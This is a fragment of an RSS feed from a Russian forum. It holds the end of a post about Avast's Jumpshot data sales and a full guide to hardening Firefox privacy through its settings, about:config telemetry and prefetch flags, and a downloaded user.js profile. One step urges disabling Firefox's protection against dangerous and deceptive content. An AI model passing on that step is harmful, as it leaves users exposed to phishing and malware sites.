						&lt;p&gt;&amp;quot;Если Вы дадите разрешение, мы предоставим нашей дочерней компании Jumpshot Inc. сбор обезличенных данных, полученных из Вашей истории просмотров, с целью позволить Jumpshot анализировать рынки и бизнес-тенденции и собирать другую ценную информацию&amp;quot;, однако во всплывающем окне не было рассказано ничего о том, как именно Jumpshot затем использует эти данные.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Thu, 18 Mar 2021 17:55:26 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=60#p60</guid>
		</item>
		<item>
			<title>Лис стал хитрее. 3 способа повысить приватность браузера Firefox</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=59#p59</link>
			<description>&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox&lt;/p&gt;
						&lt;p&gt;Устали от повсеместного отслеживания в Интернете? Браузер Firefox имеет множество параметров приватности, которые можно настроить в соответствии со своими потребностями.&lt;/p&gt;
						&lt;p&gt;Хотя Google Chrome остается одним из самых популярных браузеров, это вовсе не означает, что он самый безопасный и имеет больше полезных функций, чем другие программы для выхода в Интернет.&lt;/p&gt;
						&lt;p&gt;В отличие от Chrome, Firefox сочетает в себе быструю скорость загрузки страниц, безопасность просмотра веб-контента и стабильность в работе. Это один из самых многофункциональных браузеров в мире, поэтому он так популярен. Firefox дает вам возможность легко изменять свои настройки конфиденциальности либо с помощью встроенных параметров, либо используя сторонние расширения.&lt;/p&gt;
						&lt;p&gt;В этой статье мы узнаем, как сделать Firefox по-настоящему конфиденциальным браузером, используя только настройки самой программы.&lt;/p&gt;
						&lt;p&gt;Почему именно Firefox?&lt;br /&gt;Привлекательность Firefox заключается в его открытом исходном коде. Процесс разработки браузера является полностью прозрачным. В нем одновременно участвуют тысячи разработчиков, используя различные платформы. Такой интерес и популярность помогают браузеру получать регулярные обновления и совершенствовать свою работу.&lt;/p&gt;
						&lt;p&gt;Несколько важных фактов о Firefox:&lt;/p&gt;
						&lt;p&gt;Браузер принадлежит некоммерческой компании Mozilla.&lt;br /&gt;Он содержит огромное количество возможных расширений, использующихся для улучшения работы Firefox.&lt;br /&gt;Firefox имеет открытый исходный код.&lt;br /&gt;Компания Mozilla не сотрудничает с корпорациями, которые занимаются продажей данных пользователей.&lt;br /&gt;Firefox имеет встроенные параметры безопасности и приватности. С помощью них человек может просматривать веб-страницы, оставаясь инкогнито. Кроме этого, есть несколько быстрых настроек конфиденциальности, которые можно изменить за пару кликов.&lt;/p&gt;
						&lt;p&gt;Стоит отметить, что хотя Mozilla не продает данные своих пользователей, основным источником финансирования компании является корпорация Google. Согласно соглашению между компаниями, Google останется поисковой системой по умолчанию для Firefox, за что Mozilla получает 400-450 млн долларов каждый год.&lt;/p&gt;
						&lt;p&gt;Повысьте конфиденциальность Firefox, изменив настройки&lt;br /&gt;В жизни часто приходится идти на компромисс. Если вы готовы отказаться от некоторой степени удобства ради своей конфиденциальности и безопасности, вам придется отключить определенные функции программы.&lt;/p&gt;
						&lt;p&gt;Чтобы повысить конфиденциальность Firefox, мы сначала должны получить доступ к меню настроек, нажав на три горизонтальные линии в правом верхнем углу браузера.&lt;/p&gt;
						&lt;p&gt;В меню «Начало» снимите флажок у пункта «Страницы, сохранённые в Pocket». Это отключит сохранение веб-контента на всех ваших устройствах, подключенных к учетной записи Firefox.&lt;/p&gt;
						&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №2&lt;br /&gt;В меню «Приватность и защита» вы увидите три уровня защиты: стандартная, строгая и персональная. Выберите вариант «строгой» защиты, чтобы запретить сторонним веб-сайтам отслеживать ваши действия.&lt;/p&gt;
						&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №3&lt;br /&gt;Если «строгий» уровень защиты блокирует доступ к сайту, который вы хотите посетить, просто нажмите на значок щита рядом с адресом сайта и отключите усиленную защиту отслеживания.&lt;/p&gt;
						&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №4&lt;br /&gt;Находясь в меню «Приватность и защита», прокрутите страницу вниз до раздела «История». В раскрывающемся меню выберите параметр «Будет использовать ваши настройки хранения истории».&lt;/p&gt;
						&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №5&lt;br /&gt;Затем установите флажок у параметра «Всегда работать в режиме приватного просмотра». После этого потребуется перезагрузка браузера. С этого момента Firefox больше не будет сохранять историю посещенных вами страниц и загрузок, а также данные для автозаполнения строк. Таким образом, вы сможете удалить всю личную информацию, которая могла бы быть отслежена и проанализирована другими компаниями, такими как Amazon, Facebook, Google.&lt;/p&gt;
						&lt;p&gt;Стоит также удалить историю посещенных страниц за все время (если вы еще этого не сделали).&lt;/p&gt;
						&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №6&lt;br /&gt;Прокрутите страницу дальше вниз до раздела «Разрешения». Настройте каждый элемент, установив флажок у пункта «Блокировать новые запросы» и нажав на кнопку «Сохранить изменения».&lt;/p&gt;
						&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №7&lt;br /&gt;Далее следует раздел «Сбор и использование данных Firefox»: снимите здесь все галочки, чтобы убедиться, что взаимодействие между вашим браузером и компанией Mozilla остается минимальным. Это запретит браузеру отправлять любые телеметрические данные в Mozilla.&lt;/p&gt;
						&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №8&lt;br /&gt;Теперь самое интересное. В разделе «Защита» есть пункт «Блокировать опасное и обманывающее содержимое». Не поддавайтесь соблазну оставить флажок рядом с этим параметром, ведь именно Google решает, какой именно контент следует заблокировать. Лучше отключить данную функцию.&lt;/p&gt;
						&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №9&lt;br /&gt;Переходим в меню «Поиск». Для своего удобства лучше добавить панель поиска на панель инструментов и отделить ее от адресной строки.&lt;/p&gt;
						&lt;p&gt;Следует сделать DuckDuckGo поисковой системой по умолчанию вместо Google и снять флажок у параметра «Отображать поисковые предложения». Это еще больше сократит количество данных, известных о вас браузеру.&lt;/p&gt;
						&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №10&lt;br /&gt;Помимо DuckDuckGo, вы также можете использовать конфиденциальную поисковую систему SearX.&lt;/p&gt;
						&lt;p&gt;Наконец-то переходим в меню «Синхронизация». Стоит отключить синхронизацию данных между устройствами и удалить свой личный аккаунт Firefox (предварительно скопировав всю нужную информацию). Это значительно повысит ваш уровень конфиденциальности.&lt;/p&gt;
						&lt;p&gt;Использование команды «about:config» в Firefox&lt;br /&gt;Мы повысили конфиденциальность Firefox с помощью параметров, которые видны в его настройках. Однако «под капотом» у Firefox есть и более продвинутые параметры безопасности и конфиденциальности. Скопируйте и вставьте (или просто введите) «about:config» в адресную строку, чтобы получить к ним доступ.&lt;/p&gt;
						&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №11&lt;br /&gt;Снимите флажок у пункта «Предупреждать меня, когда я попытаюсь получить доступ к этим настройкам» и нажмите на кнопку «Принять риск и продолжить». Сперва нас интересуют параметры, связанные с телеметрией, поэтому введите «telemetry» в строку поиска. Дважды щелкните на параметрах, указанных ниже, и измените их значения на «false»:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 35em&quot;&gt;&lt;pre&gt;
browser.newtabpage.activity-stream.feeds.telemetry
browser.newtabpage.activity-stream.telemetry
browser.ping-centre.telemetry
toolkit.telemetry.archive.enabled
toolkit.telemetry.bhrPing.enabled
toolkit.telemetry.enabled
toolkit.telemetry.firstShutdownPing.enabled
toolkit.telemetry.hybridContent.enabled
toolkit.telemetry.newProfilePing.enabled
toolkit.telemetry.reportingpolicy.firstRun
toolkit.telemetry.shutdownPingSender.enabled
toolkit.telemetry.unified
toolkit.telemetry.updatePing.enabled
Теперь нажмите на «toolkit.telemetry.server» и удалите его содержимое. Это навсегда запретит передачу любых телеметрических данных между вашим браузером и Mozilla.

Теперь введите в поиске «experiments». Эти параметры связаны с исследованием работы и тестированием функций Mozilla. С помощью них браузер также собирает данные о ваших действиях. Соответственно, дважды щелкните на параметрах, указанных ниже, чтобы изменить их значение на «false»:

experiments.activeExperiment
experiments.enabled
experiments.supported
network.allow-experiments
Вам нужно также отключить сетевой префетчинг, введя «prefetch» в строку поиска. Это важный момент, потому что префетчинг отвечает за предварительную загрузку файлов cookie с сайтов. Это может ускорить загрузку веб-страниц, но и привлечет нежелательное внимание трекеров. Значения параметров должны быть следующими:

network.dns.disablePrefetch = true
network.dns.disablePrefetchFromHTTPS = true
network.predictor.enabled = false
network.predictor.enable-prefetch = false
network.prefetch-next = false
&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Импорт уже защищенного профиля Firefox&lt;br /&gt;Есть и другие способы повышения конфиденциальности, если вы хотите обеспечить себе максимальную безопасность в Интернете. Однако было бы более практично изменить все эти настройки сразу, а не каждую по отдельности. Один из способов сделать это – сменить свой профиль Firefox на тот, который уже максимально защищен.&lt;/p&gt;
						&lt;p&gt;Скачайте, распакуйте и переместите нужные файлы в папку вашего профиля Firefox. В зависимости от операционной системы следует перемещать их в определенное место:&lt;/p&gt;
						&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №12&lt;br /&gt;После того как вы распаковали загруженный профиль, нужно установить профиль по умолчанию для своего браузера Firefox. Для этого введите в адресной строке «about:profiles» и выберите пункт «Создать новый профиль».&lt;/p&gt;
						&lt;p&gt;Лис стал хитрее. 3 способа повысить приватность браузера Firefox, изображение №13&lt;br /&gt;Браузер предложит вам выбрать папку, где хранится ваш новый профиль Firefox. Он будет иметь название «user. js-master».&lt;/p&gt;
						&lt;p&gt;Теперь вы можете сделать его своим профилем по умолчанию и использовать максимальные меры безопасности, не изменяя вручную десятки настроек.&lt;/p&gt;
						&lt;p&gt;Приватность vs Комфорт&lt;br /&gt;Перечисленные выше методы для приватного просмотра страниц могут значительно снизить комфорт использования браузера. Поэтому рекомендуем вам выбрать только те настройки, которые не принесут ущерб вашей производительности. Позаботьтесь не только о приватности своих данных, но и о себе.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Thu, 18 Mar 2021 17:54:11 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=59#p59</guid>
		</item>
	</channel>
</rss>
